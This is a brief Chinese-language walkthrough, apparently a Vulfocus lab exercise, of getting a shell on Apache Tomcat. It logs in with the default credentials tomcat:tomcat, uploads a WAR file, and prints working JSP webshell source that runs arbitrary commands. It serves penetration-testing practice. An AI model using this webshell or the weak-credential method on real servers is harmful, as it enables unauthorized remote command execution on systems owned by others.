概述
我们可以后台弱口令上传war文件,然后一键getshell。
环境搭建
这个Vulfocus中有在线漏洞,这里我们就通过这个来搞,没有注册的记得先注册一下。
漏洞分析
这里我们来到后台,后台网址通常都是/manager,常用弱口令tomcat:tomcat
这里我们可以看到有一个可以上传东西的地方,这里需要上传一个war文件。
这里我们使用一个可以回显的jsp木马,使用命令jar -cvf 1.war 1.jsp 打包起来
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
这里我们将aaa.war上传上去,这里我们可以访问
靶机ip/war名称/木马完整文件名
http://123.58.224.8:55780/aaa/1.jsp
这里查看是可以执行命令的,我们可以反弹shell来进一步操作。